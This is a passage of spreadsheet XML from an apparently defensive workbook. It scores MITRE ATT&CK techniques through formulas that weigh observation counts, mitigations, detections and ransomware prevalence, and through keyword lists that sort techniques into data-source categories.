        <f t="array" ref="AI111">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD111)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ111" s="37">
        <v>107</v>
      </c>
      <c r="AK111" s="37" t="str" cm="1">
        <f t="array" ref="AK111">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD111)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL111" s="37">
        <v>107</v>
      </c>
      <c r="AM111" s="37" t="str" cm="1">
        <f t="array" ref="AM111">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD111)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN111" s="37">
        <v>0</v>
      </c>
      <c r="AO111" s="37">
        <v>1</v>
      </c>
      <c r="AP111" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ111" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>15.661904761904763</v>
      </c>
      <c r="AR111" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS111" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT111" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU11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0.39671201814058954</v>
      </c>
    </row>
    <row r="112" spans="1:47" ht="34">
      <c r="A112" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B112" s="37">
        <f t="shared" si="1"/>
        <v>82.476252333333349</v>
      </c>
      <c r="C112" s="37" t="s">
        <v>414</v>
      </c>
      <c r="D112" s="50" t="s">
        <v>409</v>
      </c>
      <c r="E112" s="37" t="s">
        <v>415</v>
      </c>
      <c r="F112" s="37">
        <v>1</v>
      </c>
      <c r="G112" s="37">
        <v>1</v>
      </c>
      <c r="H112" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I112" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J112" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K112" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L112" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M112" s="37">
        <v>0</v>
      </c>
      <c r="N112" s="56">
        <v>0</v>
      </c>
      <c r="O112" s="56">
        <v>3</v>
      </c>
      <c r="P112" s="56">
        <v>1</v>
      </c>
      <c r="Q112" s="56">
        <v>1</v>
      </c>
      <c r="R112" s="57" t="s">
        <v>416</v>
      </c>
      <c r="S112" s="57">
        <v>3</v>
      </c>
      <c r="T112" s="57" t="s">
        <v>417</v>
      </c>
      <c r="U112" s="57">
        <v>4</v>
      </c>
      <c r="V112" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>9.0476333333333339E-2</v>
      </c>
      <c r="W112" s="37">
        <v>7</v>
      </c>
      <c r="X112" s="37">
        <v>0.127273</v>
      </c>
      <c r="Y112" s="37">
        <v>0.127273</v>
      </c>
      <c r="Z112" s="37">
        <v>5</v>
      </c>
      <c r="AA112" s="37">
        <v>0.05</v>
      </c>
      <c r="AB112" s="37">
        <v>0.05</v>
      </c>
      <c r="AC112" s="37"/>
      <c r="AD112" s="50" t="s">
        <v>418</v>
      </c>
      <c r="AE112" s="37" t="str" cm="1">
        <f t="array" ref="AE112">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD112)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF112" s="37">
        <v>108</v>
      </c>
      <c r="AG112" s="37" t="str" cm="1">
        <f t="array" ref="AG112">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD112)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH112" s="37">
        <v>108</v>
      </c>
      <c r="AI112" s="37" t="str" cm="1">
        <f t="array" ref="AI112">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD112)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ112" s="37">
        <v>108</v>
      </c>
      <c r="AK112" s="37" t="str" cm="1">
        <f t="array" ref="AK112">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD112)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL112" s="37">
        <v>108</v>
      </c>
      <c r="AM112" s="37" t="str" cm="1">
        <f t="array" ref="AM112">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD112)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN112" s="37">
        <v>0</v>
      </c>
      <c r="AO112" s="37">
        <v>0</v>
      </c>
      <c r="AP112" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ112" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>27.492084111111115</v>
      </c>
      <c r="AR112" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS112" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT112" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU11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13" spans="1:47" ht="17">
      <c r="A113" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B113" s="37">
        <f t="shared" si="1"/>
        <v>101.96656261904762</v>
      </c>
      <c r="C113" s="37" t="s">
        <v>419</v>
      </c>
      <c r="D113" s="50" t="s">
        <v>409</v>
      </c>
      <c r="E113" s="37" t="s">
        <v>420</v>
      </c>
      <c r="F113" s="37">
        <v>1</v>
      </c>
      <c r="G113" s="37">
        <v>1</v>
      </c>
      <c r="H113" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I113" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J113" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K113" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L113" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M113" s="37">
        <v>0</v>
      </c>
      <c r="N113" s="56">
        <v>0</v>
      </c>
      <c r="O113" s="56">
        <v>0</v>
      </c>
      <c r="P113" s="56">
        <v>0</v>
      </c>
      <c r="Q113" s="56">
        <v>0</v>
      </c>
      <c r="R113" s="57" t="s">
        <v>421</v>
      </c>
      <c r="S113" s="57">
        <v>7</v>
      </c>
      <c r="T113" s="57" t="s">
        <v>422</v>
      </c>
      <c r="U113" s="57">
        <v>7</v>
      </c>
      <c r="V113" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.13333309523809525</v>
      </c>
      <c r="W113" s="37">
        <v>14</v>
      </c>
      <c r="X113" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Y113" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Z113" s="37">
        <v>0</v>
      </c>
      <c r="AA113" s="37">
        <v>0</v>
      </c>
      <c r="AB113" s="37">
        <v>0</v>
      </c>
      <c r="AC113" s="37"/>
      <c r="AD113" s="50" t="s">
        <v>393</v>
      </c>
      <c r="AE113" s="37" t="str" cm="1">
        <f t="array" ref="AE113">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD113)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF113" s="37">
        <v>109</v>
      </c>
      <c r="AG113" s="37" t="str" cm="1">
        <f t="array" ref="AG113">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD113)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH113" s="37">
        <v>109</v>
      </c>
      <c r="AI113" s="37" t="str" cm="1">
        <f t="array" ref="AI113">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD113)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ113" s="37">
        <v>109</v>
      </c>
      <c r="AK113" s="37" t="str" cm="1">
        <f t="array" ref="AK113">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD113)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL113" s="37">
        <v>109</v>
      </c>
      <c r="AM113" s="37" t="str" cm="1">
        <f t="array" ref="AM113">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD113)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN113" s="37">
        <v>0</v>
      </c>
      <c r="AO113" s="37">
        <v>0</v>
      </c>
      <c r="AP113" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ113" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>33.98885420634921</v>
      </c>
      <c r="AR113" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS113" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT113" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU11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14" spans="1:47" ht="17">
      <c r="A114" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B114" s="37">
        <f t="shared" si="1"/>
        <v>44.1</v>
      </c>
      <c r="C114" s="37" t="s">
        <v>423</v>
      </c>
      <c r="D114" s="50" t="s">
        <v>409</v>
      </c>
      <c r="E114" s="37" t="s">
        <v>424</v>
      </c>
      <c r="F114" s="37">
        <v>1</v>
      </c>
      <c r="G114" s="37">
        <v>1</v>
      </c>
      <c r="H114" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I114" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J114" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K114" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L114" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M114" s="37">
        <v>0</v>
      </c>
      <c r="N114" s="56">
        <v>0</v>
      </c>
      <c r="O114" s="56">
        <v>0</v>
      </c>
      <c r="P114" s="56">
        <v>0</v>
      </c>
      <c r="Q114" s="56">
        <v>0</v>
      </c>
      <c r="R114" s="57"/>
      <c r="S114" s="57">
        <v>0</v>
      </c>
      <c r="T114" s="57"/>
      <c r="U114" s="57">
        <v>0</v>
      </c>
      <c r="V114" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W114" s="37">
        <v>0</v>
      </c>
      <c r="X114" s="37">
        <v>0</v>
      </c>
      <c r="Y114" s="37">
        <v>0</v>
      </c>
      <c r="Z114" s="37">
        <v>0</v>
      </c>
      <c r="AA114" s="37">
        <v>0</v>
      </c>
      <c r="AB114" s="37">
        <v>0</v>
      </c>
      <c r="AC114" s="37"/>
      <c r="AD114" s="50" t="s">
        <v>425</v>
      </c>
      <c r="AE114" s="37" t="str" cm="1">
        <f t="array" ref="AE114">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD114)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF114" s="37">
        <v>110</v>
      </c>
      <c r="AG114" s="37" t="str" cm="1">
        <f t="array" ref="AG114">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD114)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH114" s="37">
        <v>110</v>
      </c>
      <c r="AI114" s="37" t="str" cm="1">
        <f t="array" ref="AI114">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD114)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ114" s="37">
        <v>110</v>
      </c>
      <c r="AK114" s="37" t="str" cm="1">
        <f t="array" ref="AK114">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD114)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL114" s="37">
        <v>110</v>
      </c>
      <c r="AM114" s="37" t="str" cm="1">
        <f t="array" ref="AM114">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD114)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN114" s="37">
        <v>0</v>
      </c>
      <c r="AO114" s="37">
        <v>0</v>
      </c>
      <c r="AP114" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ114" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>14.700000000000001</v>
      </c>
      <c r="AR114" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS114" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT114" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU11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15" spans="1:47" ht="34">
      <c r="A115" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.56666666666666665</v>
      </c>
      <c r="B115" s="37">
        <f t="shared" si="1"/>
        <v>115.98041357142857</v>
      </c>
      <c r="C115" s="37" t="s">
        <v>426</v>
      </c>
      <c r="D115" s="50" t="s">
        <v>427</v>
      </c>
      <c r="E115" s="37"/>
      <c r="F115" s="37">
        <v>1</v>
      </c>
      <c r="G115" s="37">
        <v>1</v>
      </c>
      <c r="H115" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I115" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J115" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K115" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L115" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M115" s="37">
        <v>0.117773</v>
      </c>
      <c r="N115" s="56">
        <v>2</v>
      </c>
      <c r="O115" s="56">
        <v>5</v>
      </c>
      <c r="P115" s="56">
        <v>2</v>
      </c>
      <c r="Q115" s="56">
        <v>0</v>
      </c>
      <c r="R115" s="57"/>
      <c r="S115" s="57">
        <v>0</v>
      </c>
      <c r="T115" s="57"/>
      <c r="U115" s="57">
        <v>0</v>
      </c>
      <c r="V115" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>4.2857142857142851E-2</v>
      </c>
      <c r="W115" s="37">
        <v>0</v>
      </c>
      <c r="X115" s="37">
        <v>0</v>
      </c>
      <c r="Y115" s="37">
        <v>0</v>
      </c>
      <c r="Z115" s="37">
        <v>9</v>
      </c>
      <c r="AA115" s="37">
        <v>0.09</v>
      </c>
      <c r="AB115" s="37">
        <v>0.09</v>
      </c>
      <c r="AC115" s="37"/>
      <c r="AD115" s="50" t="s">
        <v>131</v>
      </c>
      <c r="AE115" s="37" t="str" cm="1">
        <f t="array" ref="AE115">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD115)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF115" s="37">
        <v>111</v>
      </c>
      <c r="AG115" s="37" t="str" cm="1">
        <f t="array" ref="AG115">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD115)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH115" s="37">
        <v>111</v>
      </c>
      <c r="AI115" s="37" t="str" cm="1">
        <f t="array" ref="AI115">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD115)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ115" s="37">
        <v>111</v>
      </c>
      <c r="AK115" s="37" t="str" cm="1">
        <f t="array" ref="AK115">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD115)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL115" s="37">
        <v>111</v>
      </c>
      <c r="AM115" s="37" t="str" cm="1">
        <f t="array" ref="AM115">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD115)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN115" s="37">
        <v>0</v>
      </c>
      <c r="AO115" s="37">
        <v>8</v>
      </c>
      <c r="AP115" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.56666666666666665</v>
      </c>
      <c r="AQ115" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>38.660137857142857</v>
      </c>
      <c r="AR115" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS115" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.38095238095238093</v>
      </c>
      <c r="AT115" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.38095238095238093</v>
      </c>
      <c r="AU11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7.5543119727891153</v>
      </c>
    </row>
    <row r="116" spans="1:47" ht="51">
      <c r="A116" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.46666666666666667</v>
      </c>
      <c r="B116" s="37">
        <f t="shared" si="1"/>
        <v>1308.5143712380952</v>
      </c>
      <c r="C116" s="37" t="s">
        <v>428</v>
      </c>
      <c r="D116" s="50" t="s">
        <v>429</v>
      </c>
      <c r="E116" s="37"/>
      <c r="F116" s="37">
        <v>10</v>
      </c>
      <c r="G116" s="37">
        <v>15</v>
      </c>
      <c r="H116" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>1</v>
      </c>
      <c r="I116" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>1</v>
      </c>
      <c r="J116" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>1</v>
      </c>
      <c r="K116" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>1.5</v>
      </c>
      <c r="L116" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>1</v>
      </c>
      <c r="M116" s="37">
        <v>1</v>
      </c>
      <c r="N116" s="56">
        <v>1</v>
      </c>
      <c r="O116" s="56">
        <v>51</v>
      </c>
      <c r="P116" s="56">
        <v>64</v>
      </c>
      <c r="Q116" s="56">
        <v>57</v>
      </c>
      <c r="R116" s="57" t="s">
        <v>430</v>
      </c>
      <c r="S116" s="57">
        <v>22</v>
      </c>
      <c r="T116" s="57" t="s">
        <v>431</v>
      </c>
      <c r="U116" s="57">
        <v>24</v>
      </c>
      <c r="V116" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.91428590476190474</v>
      </c>
      <c r="W116" s="37">
        <v>46</v>
      </c>
      <c r="X116" s="37">
        <v>0.836364</v>
      </c>
      <c r="Y116" s="37">
        <v>0.836364</v>
      </c>
      <c r="Z116" s="37">
        <v>173</v>
      </c>
      <c r="AA116" s="37">
        <v>1.73</v>
      </c>
      <c r="AB116" s="37">
        <v>1</v>
      </c>
      <c r="AC116" s="37"/>
      <c r="AD116" s="50" t="s">
        <v>432</v>
      </c>
      <c r="AE116" s="37" t="str" cm="1">
        <f t="array" ref="AE116">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD116)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF116" s="37">
        <v>112</v>
      </c>
      <c r="AG116" s="37" t="str" cm="1">
        <f t="array" ref="AG116">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD116)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH116" s="37">
        <v>112</v>
      </c>
      <c r="AI116" s="37" t="str" cm="1">
        <f t="array" ref="AI116">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD116)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ116" s="37">
        <v>112</v>
      </c>
      <c r="AK116" s="37" t="str" cm="1">
        <f t="array" ref="AK116">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD116)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL116" s="37">
        <v>112</v>
      </c>
      <c r="AM116" s="37" t="str" cm="1">
        <f t="array" ref="AM116">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD116)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN116" s="37">
        <v>0</v>
      </c>
      <c r="AO116" s="37">
        <v>5</v>
      </c>
      <c r="AP116" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.46666666666666667</v>
      </c>
      <c r="AQ116" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>436.1714570793651</v>
      </c>
      <c r="AR116" s="37">
